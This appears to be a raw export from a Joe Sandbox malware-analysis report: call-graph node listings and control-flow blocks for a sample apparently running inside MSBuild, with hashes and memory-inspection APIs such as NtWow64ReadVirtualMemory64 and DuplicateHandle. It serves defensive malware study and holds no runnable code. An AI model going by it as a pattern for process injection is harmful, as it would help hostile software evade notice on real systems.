37618->37620 37621 eba830 13 API calls 37618->37621 37619->37619 37620->37618 37621->37618 37624 eb9187 37622->37624 37623 eb95db 37623->37623 37624->37623 37625 eba840 13 API calls 37624->37625 37626 eba830 13 API calls 37624->37626 37625->37624 37626->37624 37629 eb9187 37627->37629 37628 eb95db 37628->37628 37629->37628 37630 eba840 13 API calls 37629->37630 37631 eba830 13 API calls 37629->37631 37630->37629 37631->37629 37633 eba855 37632->37633 37642 ebad8c 37633->37642 37647 ebacb0 37633->37647 37634 eba883 37634->37614 37638 eba855 37637->37638 37640 ebad8c 10 API calls 37638->37640 37641 ebacb0 13 API calls 37638->37641 37639 eba883 37639->37614 37640->37639 37641->37639 37643 ebada0 37642->37643 37644 ebb029 37643->37644 37655 59d24b0 37643->37655 37659 59d24a0 37643->37659 37644->37634 37648 ebacf4 37647->37648 37649 ebad77 37648->37649 37694 ebbccf 37648->37694 37705 ebbd40 37648->37705 37650 ebb029 37649->37650 37651 59d24b0 10 API calls 37649->37651 37652 59d24a0 10 API calls 37649->37652 37650->37634 37651->37650 37652->37650 37656 59d24e4 37655->37656 37663 59d2d68 37656->37663 37660 59d24ad 37659->37660 37662 59d2d68 10 API calls 37660->37662 37661 59d2788 37661->37644 37662->37661 37664 59d2d95 37663->37664 37668 59d2dd8 37664->37668 37672 59d2de8 37664->37672 37665 59d2788 37665->37644 37669 59d2e0b 37668->37669 37676 59d2e5f 37669->37676 37673 59d2e0b 37672->37673 37675 59d2e5f 10 API calls 37673->37675 37674 59d2e3a 37674->37665 37675->37674 37677 59d2ea4 37676->37677 37678 59d2e3a 37677->37678 37681 59d37a0 37677->37681 37685 59d37b0 37677->37685 37678->37665 37682 59d37b0 37681->37682 37689 59d3cf2 37682->37689 37686 59d37db 37685->37686 37688 59d3cf2 10 API calls 37686->37688 37687 59d3953 37687->37678 37688->37687 37690 59d3d2d 37689->37690 37691 59d3953 37690->37691 37692 59d4338 10 API calls 37690->37692 37693 59d4348 10 API calls 37690->37693 37691->37678 37692->37691 37693->37691 37695 ebbcd6 37694->37695 37716 59d0d90 37695->37716 37731 59d0da0 37695->37731 37696 ebbe6a 37703 59d0d90 3 API calls 37696->37703 37704 59d0da0 3 API calls 37696->37704 37697 ebbed8 37701 59d0d90 3 API calls 37697->37701 37702 59d0da0 3 API calls 37697->37702 37698 ebbf46 37698->37649 37701->37698 37702->37698 37703->37697 37704->37697 37706 ebbd64 37705->37706 37710 59d0d90 3 API calls 37706->37710 37711 59d0da0 3 API calls 37706->37711 37707 ebbe6a 37714 59d0d90 3 API calls 37707->37714 37715 59d0da0 3 API calls 37707->37715 37708 ebbf46 37708->37649 37709 ebbed8 37712 59d0d90 3 API calls 37709->37712 37713 59d0da0 3 API calls 37709->37713 37710->37707 37711->37707 37712->37708 37713->37708 37714->37709 37715->37709 37717 59d0dd3 37716->37717 37746 ebcfb8 37717->37746 37749 ebcfb0 37717->37749 37718 59d0ed1 37722 59d0ef3 37718->37722 37752 ebdd94 NtWow64ReadVirtualMemory64 37718->37752 37720 59d12da 37721 59d154f 37720->37721 37720->37722 37727 ebdd94 NtWow64ReadVirtualMemory64 37720->37727 37721->37722 37723 59d1bb8 37721->37723 37726 ebdd94 NtWow64ReadVirtualMemory64 37721->37726 37722->37696 37723->37722 37724 ebdd94 NtWow64ReadVirtualMemory64 37723->37724 37724->37723 37726->37721 37727->37721 37728 ebdd94 NtWow64ReadVirtualMemory64 37728->37720 37732 59d0dd3 37731->37732 37740 ebcfb8 DuplicateHandle 37732->37740 37741 ebcfb0 DuplicateHandle 37732->37741 37733 59d0ed1 37737 59d0ef3 37733->37737 37743 ebdd94 NtWow64ReadVirtualMemory64 37733->37743 37734 59d1046 37734->37737 37739 ebdd94 NtWow64ReadVirtualMemory64 37734->37739 37735 59d12da 37736 59d154f 37735->37736 37735->37737 37745 ebdd94 NtWow64ReadVirtualMemory64 37735->37745 37736->37737 37738 59d1bb8 37736->37738 37744 ebdd94 NtWow64ReadVirtualMemory64 37736->37744 37737->37696 37738->37737 37742 ebdd94 NtWow64ReadVirtualMemory64 37738->37742 37739->37735 37740->37733 37741->37733 37742->37738 37743->37734 37744->37736 37745->37736 37747 ebd005 DuplicateHandle 37746->37747 37748 ebd09a 37747->37748 37748->37718 37750 ebd005 DuplicateHandle 37749->37750 37751 ebd09a 37750->37751 37751->37718 37753 ebddcd 37752->37753 37753->37722 37753->37728 37755 eb9919 37754->37755 37756 eba0e7 37755->37756 37789 59d5e11 37755->37789 37794 59d5e20 37755->37794 37756->37756 37760 eb9919 37759->37760 37761 eba0e7 37760->37761 37762 59d5e11 4 API calls 37760->37762 37763 59d5e20 4 API calls 37760->37763 37761->37761 37762->37760 37763->37760 37765 eb9919 37764->37765 37766 eba0e7 37765->37766 37767 59d5e11 4 API calls 37765->37767 37768 59d5e20 4 API calls 37765->37768 37766->37766 37767->37765 37768->37765 37770 eb9919 37769->37770 37771 eba0e7 37770->37771 37772 59d5e11 4 API calls 37770->37772 37773 59d5e20 4 API calls 37770->37773 37771->37771 37772->37770 37773->37770 37776 eb97bd 37774->37776 37775 eba0e7 37775->37775 37776->37775 37777 59d5e11 4 API calls 37776->37777 37778 59d5e20 4 API calls 37776->37778 37777->37776 37778->37776 37781 eb9919 37779->37781 37780 eba0e7 37780->37780 37781->37780 37782 59d5e11 4 API calls 37781->37782 37783 59d5e20 4 API calls 37781->37783 37782->37781 37783->37781 37786 eb9919 37784->37786 37785 eba0e7 37785->37785 37786->37785 37787 59d5e11 4 API calls 37786->37787 37788 59d5e20 4 API calls 37786->37788 37787->37786 37788->37786 37790 59d5e20 37789->37790 37791 59d5e8c 37790->37791 37799 59d76a9 37790->37799 37805 59d76b8 37790->37805 37791->37755 37795 59d5e4d 37794->37795 37796 59d5e8c 37795->37796 37797 59d76a9 4 API calls 37795->37797 37798 59d76b8 4 API calls 37795->37798 37796->37755 37797->37796 37798->37796 37800 59d76c0 37799->37800 37802 59d76c7 37799->37802 37800->37791 37801 59d7708 37801->37791 37802->37801 37811 59d77aa 37802->37811 37806 59d76c0 37805->37806 37808 59d76c7 37805->37808 37806->37791 37807 59d7708 37807->37791 37808->37807 37810 59d77aa 4 API calls 37808->37810 37809 59d7790 37809->37791 37810->37809 37812 59d77b5 37811->37812 37814 59d7800 37812->37814 37817 59d7f39 37812->37817 37832 59d7f48 37812->37832 37813 59d7790 37813->37791 37818 59d7f64 37817->37818 37825 59d7f39 4 API calls 37818->37825 37826 59d7f48 4 API calls 37818->37826 37847 59d8020 37818->37847 37855 59d8030 37818->37855 37819 59d7fb0 37819->37813 37820 59d7f98 37820->37819 37821 59d8051 37820->37821 37822 59d8123 37820->37822 37823 59d8067 37821->37823 37863 59d8e52 37821->37863 37868 59d8a8f 37822->37868 37875 59d8aa0 37822->37875 37823->37813 37824 59d823f 37824->37813 37825->37820 37826->37820 37833 59d7f64 37832->37833 37842 59d7f39 4 API calls 37833->37842 37843 59d7f48 4 API calls 37833->37843 37844 59d8030 4 API calls 37833->37844 37845 59d8020 4 API calls 37833->37845 37834 59d7fb0 37834->37813 37835 59d7f98 37835->37834 37836 59d8051 37835->37836 37837 59d8123 37835->37837 37838 59d8067 37836->37838 37846 59d8e52 4 API calls 37836->37846 37840 59d8a8f 2 API calls 37837->37840 37841 59d8aa0 2 API calls 37837->37841 37838->37813 37839 59d823f 37839->37813 37840->37839 37841->37839 37842->37835 37843->37835 37844->37835 37845->37835 37846->37838 37848 59d8051 37847->37848 37849 59d8123 37847->37849 37850 59d8067 37848->37850 37852 59d8e52 4 API calls 37848->37852 37853 59d8a8f 2 API calls 37849->37853 37854 59d8aa0 2 API calls 37849->37854 37850->37820 37851 59d823f 37851->37820 37852->37850 37853->37851 37854->37851 37856 59d8051 37855->37856 37857 59d8123 37855->37857 37858 59d8067 37856->37858 37862 59d8e52 4 API calls 37856->37862 37860 59d8a8f 2 API calls 37857->37860 37861 59d8aa0 2 API calls 37857->37861 37858->37820 37859 59d823f 37859->37820 37860->37859 37861->37859 37862->37858 37864 59d8e8e 37863->37864 37865 59d8030 4 API calls 37864->37865 37866 59d8ef3 37864->37866 37867 59d8e52 4 API calls 37864->37867 37865->37864 37866->37823 37867->37864 37869 59d8a9f 37868->37869 37870 59d8a3e 37868->37870 37869->37824 37871 59d8ba2 LdrInitializeThunk 37869->37871 37870->37824 37872 59d8bd1 37871->37872 37873 59d8cc6 LdrInitializeThunk 37872->37873 37874 59d8caa 37872->37874 37873->37874 37874->37824 37876 59d8aa5 37875->37876 37876->37824 37877 59d8ba2 LdrInitializeThunk 37876->37877 37878 59d8bd1 37877->37878 37879 59d8cc6 LdrInitializeThunk 37878->37879 37880 59d8caa 37878->37880 37879->37880 37880->37824 37547 ebb820 37548 ebb837 37547->37548 37551 ebb8b0 3 API calls 37548->37551 37552 ebb8a0 37548->37552 37549 ebb85a 37551->37549 37553 ebb8ca 37552->37553 37554 ebb8cf KiUserExceptionDispatcher 37552->37554 37553->37554 37555 ebb910 37554->37555 37556 ebb906 37554->37556 37557 ebd0f9 LdrInitializeThunk 37555->37557 37558 ebd108 LdrInitializeThunk 37555->37558 37556->37549 37557->37556 37558->37556 37563 ebd5e0 37564 ebd5f7 37563->37564 37565 ebb8b0 3 API calls 37564->37565 37566 ebd619 37565->37566 37575 eb56b0 37576 eb56d2 PerfStartProviderEx 37575->37576 37578 eb619a 37576->37578 37881 ebd3c0 37882 ebd410 NtWow64QueryInformationProcess64 37881->37882 37883 ebd486 37882->37883 37579 59d2380 37580 59d23c8 RtlCreateHeap 37579->37580 37581 59d2449 37580->37581 37884 59d06f0 37887 59d070c 37884->37887 37885 59d096c 37886 59d07ea LdrInitializeThunk 37886->37887 37887->37885 37887->37886

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 59d5e20-59d5e4b 1 59d5e4d 0->1 2 59d5e52-59d5e8a 0->2 1->2 4 59d5e8c-59d5e95 2->4 5 59d5e9a-59d5ed2 2->5 6 59d6b44-59d6b50 4->6 9 59d5ed4-59d5edd 5->9 10 59d5ee2-59d5f12 call 59d6df9 5->10 9->6 129 59d5f14 call 59d76a9 10->129 130 59d5f14 call 59d76b8 10->130 13 59d5f1a-59d5f2d 14 59d5f2f-59d5f30 13->14 15 59d5f35-59d5fba 13->15 16 59d5fd5-59d5ffb 14->16 50 59d5fc4-59d5fca 15->50 17 59d5ffd-59d600f 16->17 18 59d6014-59d60e8 16->18 20 59d60ee-59d6149 17->20 18->20 26 59d6168-59d623e 20->26 27 59d614b-59d6163 20->27 28 59d6244-59d6267 26->28 27->28 131 59d626a call 5992e8b 28->131 132 59d626a call 5992c80 28->132 133 59d626a call 5992f64 28->133 134 59d626a call 5992c27 28->134 32 59d626c-59d6291 33 59d663c-59d665a 32->33 34 59d6297-59d62b6 32->34 40 59d6660-59d668e 33->40 38 59d62b8-59d62d0 34->38 39 59d62d5-59d63de 34->39 43 59d63e4-59d6434 38->43 39->43 52 59d6b39-59d6b42 40->52 53 59d6694-59d669c 40->53 47 59d6477-59d65b5 43->47 48 59d6436-59d6472 43->48 54 59d65bb-59d660a 47->54 48->54 50->16 52->6 56 59d669e-59d669f 53->56 57 59d66a4-59d672c 53->57 68 59d660f-59d663a 54->68 62 59d6737-59d676f 56->62 57->62 65 59d678e-59d6888 62->65 66 59d6771-59d6789 62->66 71 59d688e-59d68d2 65->71 66->71 68->40 74 59d6909-59d6a1b 71->74 75 59d68d4-59d6904 71->75 78 59d6a21-59d6b1c 74->78 75->78 126 59d6b24-59d6b37 78->126 126->6 129->13 130->13 131->32 132->32 133->32 134->32
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID: #$S$T
                            • API String ID: 0-2617736706
                            • Opcode ID: 6b30d282f804ea6628eb473a5f68abc2c13cc68ba323c2dad81c760c56a4cb12
                            • Instruction ID: 02015d71e6500ebacd08a65cf33c4c9efe1c5f1d6e24cf282d0a2d44cdb36077
                            • Opcode Fuzzy Hash: 6b30d282f804ea6628eb473a5f68abc2c13cc68ba323c2dad81c760c56a4cb12
                            • Instruction Fuzzy Hash: 0F826D78A052299FDB65DF69D884BD9BBB2BB89300F1081EAD80DA7354DB315E81CF50

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1127 ebd3b8-ebd408 1128 ebd410-ebd484 NtWow64QueryInformationProcess64 1127->1128 1129 ebd48d-ebd4cf 1128->1129 1130 ebd486-ebd48c 1128->1130 1130->1129
                            APIs
                            • NtWow64QueryInformationProcess64.NTDLL(?,?,?,?,?), ref: 00EBD474
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID: InformationProcess64QueryWow64
                            • String ID: buz
                            • API String ID: 1933981353-3044919918
                            • Opcode ID: ab3eedb6d5f0d515f8c902329a8080857b2cc81757dc3c29760fbd5424fd0652
                            • Instruction ID: 1d88ca135138713c0455db979010875ca93cc6510d3ee5ff1bd2b435112ac944
                            • Opcode Fuzzy Hash: ab3eedb6d5f0d515f8c902329a8080857b2cc81757dc3c29760fbd5424fd0652
                            • Instruction Fuzzy Hash: CE4166B9D052589FCF00CFA9D984ADEFBB1BB49310F24A02AE818B7310D375A945CF64

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1134 ebd3c0-ebd484 NtWow64QueryInformationProcess64 1136 ebd48d-ebd4cf 1134->1136 1137 ebd486-ebd48c 1134->1137 1137->1136
                            APIs
                            • NtWow64QueryInformationProcess64.NTDLL(?,?,?,?,?), ref: 00EBD474
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID: InformationProcess64QueryWow64
                            • String ID: buz
                            • API String ID: 1933981353-3044919918
                            • Opcode ID: 85316c58506cebf1d50d831e86b0d413c044e868bebbdbc6dcdb966c1c05b38e
                            • Instruction ID: ab3853e2649835852f6ac45c54ea45f51664fce64c519c28f8cf4e6684eb465d
                            • Opcode Fuzzy Hash: 85316c58506cebf1d50d831e86b0d413c044e868bebbdbc6dcdb966c1c05b38e
                            • Instruction Fuzzy Hash: D54166B9D052589FCB00CFA9D984ADEFBB1BB49310F10902AE818B7310D375A905CF64

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1141 59d8a8f-59d8a9d 1142 59d8a9f-59d8aaa 1141->1142 1143 59d8a3e-59d8a49 1141->1143 1146 59d8aac-59d8ab1 1142->1146 1147 59d8ab4-59d8ae8 1142->1147 1144 59d8a5e 1143->1144 1145 59d8a4b-59d8a5c 1143->1145 1148 59d8a60-59d8a62 1144->1148 1145->1148 1149 59d8aa5-59d8aad 1146->1149 1150 59d8ab3 1146->1150 1151 59d8aef-59d8b6c 1147->1151 1152 59d8aea 1147->1152 1155 59d8a88-59d8a8e 1148->1155 1156 59d8a64-59d8a87 1148->1156 1149->1150 1158 59d8aaf-59d8ab1 1149->1158 1150->1147 1159 59d8b6e-59d8b76 1151->1159 1160 59d8b78 1151->1160 1152->1151 1158->1149 1158->1150 1162 59d8b7f-59d8c17 LdrInitializeThunk 1159->1162 1160->1162 1168 59d8c19-59d8c54 1162->1168 1169 59d8c55-59d8c6c 1162->1169 1168->1169 1172 59d8c6e-59d8c6f 1169->1172 1173 59d8c71-59d8c79 1169->1173 1174 59d8c7a-59d8c7e 1172->1174 1173->1174 1177 59d8c80-59d8c81 1174->1177 1178 59d8c83-59d8c8b 1174->1178 1179 59d8c8c-59d8ca8 1177->1179 1178->1179 1182 59d8caa-59d8cb2 1179->1182 1183 59d8cb7-59d8cfa LdrInitializeThunk 1179->1183 1184 59d8df2-59d8dfa 1182->1184 1186 59d8d01-59d8d4d 1183->1186 1189 59d8d4f-59d8d8a 1186->1189 1190 59d8d8b-59d8da2 1186->1190 1189->1190 1192 59d8da4-59d8da5 1190->1192 1193 59d8da7-59d8daf 1190->1193 1195 59d8db0-59d8db4 1192->1195 1193->1195 1197 59d8db9-59d8dc1 1195->1197 1198 59d8db6-59d8db7 1195->1198 1200 59d8dc2-59d8dde 1197->1200 1198->1200 1203 59d8dea-59d8df0 1200->1203 1204 59d8de0-59d8de8 1200->1204 1203->1184 1204->1184
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 03571059fb7c556aa33cb8256b17b386ef3ec16218dea5b335b65c2076af961a
                            • Instruction ID: 3f5e0ecdda326c6df923fdaf6cc85c4aba44b547b8b9ef746c7d75d1dde83f53
                            • Opcode Fuzzy Hash: 03571059fb7c556aa33cb8256b17b386ef3ec16218dea5b335b65c2076af961a
                            • Instruction Fuzzy Hash: 41C10375E05258CFDB54CFA5C884AAEFBB6BF89300F20D46AD409AB355DB349946CF10

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1205 59d9b28-59d9b63 1206 59d9b6a-59d9c13 1205->1206 1207 59d9b65 1205->1207 1208 59d9ed8-59d9ee1 1206->1208 1207->1206 1209 59d9c18-59d9c21 1208->1209 1210 59d9ee7-59d9f0c 1208->1210 1211 59d9c28-59d9c33 1209->1211 1212 59d9c23 1209->1212 1215 59d9f0e 1210->1215 1216 59d9f13-59d9f24 1210->1216 1281 59d9c36 call 59da110 1211->1281 1282 59d9c36 call 59da112 1211->1282 1212->1211 1214 59d9c3c-59d9c5c 1217 59d9c5e-59d9c60 1214->1217 1218 59d9c65-59d9ccd 1214->1218 1215->1216 1219 59d9f2b-59d9f44 1216->1219 1220 59d9f26 1216->1220 1222 59d9ed5 1217->1222 1247 59d9ccf-59d9ce6 1218->1247 1248 59d9d0b-59d9d0d 1218->1248 1221 59da03b-59da047 1219->1221 1220->1219 1223 59da04d-59da05e 1221->1223 1224 59d9f49-59d9f55 1221->1224 1222->1208 1228 59da064-59da075 1223->1228 1229 59da0e1-59da0e8 1223->1229 1226 59d9f5c-59d9fae LdrInitializeThunk 1224->1226 1227 59d9f57 1224->1227 1238 59d9fb5-59d9fe1 1226->1238 1227->1226 1231 59da0d2-59da0de 1228->1231 1233 59da080-59da08c 1231->1233 1234 59da0e0 1231->1234 1235 59da08e 1233->1235 1236 59da093-59da0cf 1233->1236 1234->1229 1235->1236 1236->1231 1242 59d9ff0 1238->1242 1243 59d9fe3-59d9fef 1238->1243 1242->1221 1243->1242 1247->1248 1253 59d9ce8-59d9d09 1247->1253 1249 59d9d10-59d9d1b 1248->1249 1250 59d9da1-59d9dbb 1249->1250 1251 59d9d21-59d9d5d 1249->1251 1257 59d9dbd-59d9dda 1250->1257 1258 59d9ddc 1250->1258 1264 59d9d5f-59d9d99 1251->1264 1265 59d9d9a-59d9d9c 1251->1265 1253->1249 1259 59d9de3-59d9dee 1257->1259 1258->1259 1262 59d9e31-59d9e3b 1259->1262 1263 59d9df0-59d9e2c 1259->1263 1266 59d9ed4 1262->1266 1267 59d9e41-59d9ed3 1262->1267 1263->1266 1264->1265 1265->1266 1266->1222 1267->1266 1281->1214 1282->1214
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 1f6f4629f4bfcdcb2c6d46cae35dc9e8fe91de81a4b6e5be7c9262ac15fb43e2
                            • Instruction ID: 65df89af9bd958b12b019085dbd3123f73aea8b3441fab5f0b755632242dfbc5
                            • Opcode Fuzzy Hash: 1f6f4629f4bfcdcb2c6d46cae35dc9e8fe91de81a4b6e5be7c9262ac15fb43e2
                            • Instruction Fuzzy Hash: 79F1D174D05218CFDB24DFA9C984B9DFBB2BF89300F20C5AAD409A7255DB349A85CF60

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1445 59d06f0-59d070a 1446 59d070c 1445->1446 1447 59d0711-59d0776 1445->1447 1446->1447 1449 59d077d-59d078b 1447->1449 1450 59d0778 1447->1450 1451 59d078d 1449->1451 1452 59d0792-59d07a5 1449->1452 1450->1449 1451->1452 1453 59d095d-59d0966 1452->1453 1454 59d096c-59d097d 1453->1454 1455 59d07aa-59d07b3 1453->1455 1458 59d097f-59d0986 1454->1458 1459 59d0991-59d09be 1454->1459 1456 59d07ba-59d0817 LdrInitializeThunk 1455->1456 1457 59d07b5 1455->1457 1467 59d081e-59d0882 1456->1467 1457->1456 1460 59d09d2-59d09da 1458->1460 1465 59d09ca-59d09d0 1459->1465 1466 59d09c0-59d09c8 1459->1466 1465->1460 1466->1460 1472 59d088e 1467->1472 1473 59d0884-59d088d 1467->1473 1472->1453 1473->1472
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 30d997372660b433beac091512fa875a78522e023435bbf9c106d9a0e996483d
                            • Instruction ID: a21c298977a5d06375e143a7f6134af568b9b83822bc017163964315a5a0a5f5
                            • Opcode Fuzzy Hash: 30d997372660b433beac091512fa875a78522e023435bbf9c106d9a0e996483d
                            • Instruction Fuzzy Hash: F7719274E04208CFDB14DFAAD584A9EFBF2BF89300F24D129D409AB255E7349946CF54

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1475 599eae8-599eb11 1476 599eb13 1475->1476 1477 599eb16-599eb2f 1475->1477 1476->1477 1478 599eb37-599eb46 1477->1478 1480 599eb48-599eb57 1478->1480 1481 599eba3-599ebb2 1478->1481 1484 599eb59-599eb69 1480->1484 1485 599eb8c-599eba1 call 599aa70 1480->1485 1486 599ebcb-599ebde call 599aa70 1481->1486 1487 599ebb4-599ebc9 call 599aa70 1481->1487 1484->1485 1490 599eb6b-599eb8a 1484->1490 1496 599ebe0-599ec1e 1485->1496 1486->1496 1487->1496 1490->1481 1490->1485 1499 599ec2a-599ec30 1496->1499 1500 599ec20-599ec28 1496->1500 1501 599ec33-599ec35 1499->1501 1500->1501 1502 599ec3e-599ec63 1501->1502 1503 599ec37-599ec3c 1501->1503 1521 599ec65-599ec75 1502->1521 1522 599ec77 1502->1522 1504 599ec7a-599ec7c 1503->1504 1505 599ec7e-599ec82 1504->1505 1506 599ecc4-599eccb 1504->1506 1505->1506 1510 599ec84-599ecad 1505->1510 1508 599ecd1-599ecdb call 59962a0 1506->1508 1509 599ef43-599ef74 1506->1509 1519 599ecdd-599ece1 1508->1519 1520 599ed51-599ed58 1508->1520 1529 599ef80-599ef87 1509->1529 1530 599ef76-599ef78 1509->1530 1516 599ecb9-599ecbf 1510->1516 1517 599ecaf-599ecb1 1510->1517 1523 599f003-599f00a 1516->1523 1517->1516 1524 599ecff-599ed4c 1519->1524 1525 599ece3-599ecfa 1519->1525 1526 599ed5e-599ed70 1520->1526 1527 599ede6-599edef 1520->1527 1521->1504 1522->1504 1524->1509 1525->1523 1526->1527 1540 599ed72-599ed76 1526->1540 1531 599edfa-599ee40 1527->1531 1532 599edf1-599edf7 1527->1532 1537 599ef89-599ef8d 1529->1537 1538 599ef8f-599ef95 1529->1538 1530->1529 1531->1509 1576 599ee46-599ee4a 1531->1576 1532->1531 1541 599ef9f-599efa3 1537->1541 1538->1541 1542 599ef97-599ef99 1538->1542 1546 599ed78-599ed8f 1540->1546 1547 599ed94-599ede1 1540->1547 1543 599efc8-599efd2 call 59962a0 1541->1543 1544 599efa5-599efae 1541->1544 1542->1541 1549 599ef9b 1542->1549 1561 599eff4-599eff8 1543->1561 1562 599efd4-599efeb 1543->1562 1550 599efb8-599efbf 1544->1550 1551 599efb0-599efb6 1544->1551 1546->1523 1547->1509 1549->1541 1555 599efc2-599efc3 call 599b278 1550->1555 1551->1555 1555->1543 1563 599effa 1561->1563 1564 599f001 1561->1564 1562->1561 1577 599efed 1562->1577 1563->1564 1564->1523 1578 599ee68-599ee6b 1576->1578 1579 599ee4c-599ee63 1576->1579 1577->1561 1580 599ee71-599eef4 1578->1580 1581 599eef6-599ef38 1578->1581 1579->1523 1580->1509 1581->1509
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: 03c4344c89d296bb9c58e482213697c27457f6d44e90b82a3bc0d9663e19e066
                            • Instruction ID: 0b3ae13c7e1ce162ec5efc6b62b5dd5a75435c9a9fa9ce938c80359bd36c7c12
                            • Opcode Fuzzy Hash: 03c4344c89d296bb9c58e482213697c27457f6d44e90b82a3bc0d9663e19e066
                            • Instruction Fuzzy Hash: 38023B70A00205DFDB19DF68C499AAEBBBBFF88301F548469E4069B391DB35ED45CB90
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: ac0d00647d45304eb9d4c7c925e24a6bb89e4daa7bdb059fb5db01c6a416f823
                            • Instruction ID: b50e6fc9e101d99228e8e0eb9e08010aea1afbe800b7a96eedb1453614b9477a
                            • Opcode Fuzzy Hash: ac0d00647d45304eb9d4c7c925e24a6bb89e4daa7bdb059fb5db01c6a416f823
                            • Instruction Fuzzy Hash: 3C41AF74E05208DFDB18DFA9D584ADEBBF2AF89301F20912AE409BB365DB355842CB54
                            APIs
                            • NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,?,?), ref: 00EBDDBB
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID: Memory64ReadVirtualWow64
                            • String ID:
                            • API String ID: 3357887247-0
                            • Opcode ID: 76f38c2af00e41dd2006f6f995d1ec7b26f3576111f71d7baefd8362e35d6b6d
                            • Instruction ID: 7bc5531b4c624f398a08fff64bf8f9c82b313e8e1b01d1201d9646577283b10c
                            • Opcode Fuzzy Hash: 76f38c2af00e41dd2006f6f995d1ec7b26f3576111f71d7baefd8362e35d6b6d
                            • Instruction Fuzzy Hash: 11116675D0424D9FDF10CFE8D884ACDFBB1AB48314F24901AE919BB260D376A896DB50
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1a12c82a4483e9317c3c610fe0d2955abdbc1d3f11e55b005ee2865b6a01d57a
                            • Instruction ID: c3e9974d6a2cb47739fd2f1396469556d80a7ebf7f58c84d3cb0347032f53150
                            • Opcode Fuzzy Hash: 1a12c82a4483e9317c3c610fe0d2955abdbc1d3f11e55b005ee2865b6a01d57a
                            • Instruction Fuzzy Hash: 6572DE75901228DFCB65DF64CC44BEABBB6BF88300F1091EAE509A7261DB319E84DF40
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0c61a319b2999b4856fbf2fbf090e99b0d19821932ade88963e32eecec4ff0be
                            • Instruction ID: 1bd0de8fe1e0a9c532c4a5166de9236b6e9f311478bede479248db0b12bca253
                            • Opcode Fuzzy Hash: 0c61a319b2999b4856fbf2fbf090e99b0d19821932ade88963e32eecec4ff0be
                            • Instruction Fuzzy Hash: 04523B35600605DFCB25DF68C584A6AFBF6FF88301B558959E84A9B751DB30FC81CB90
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
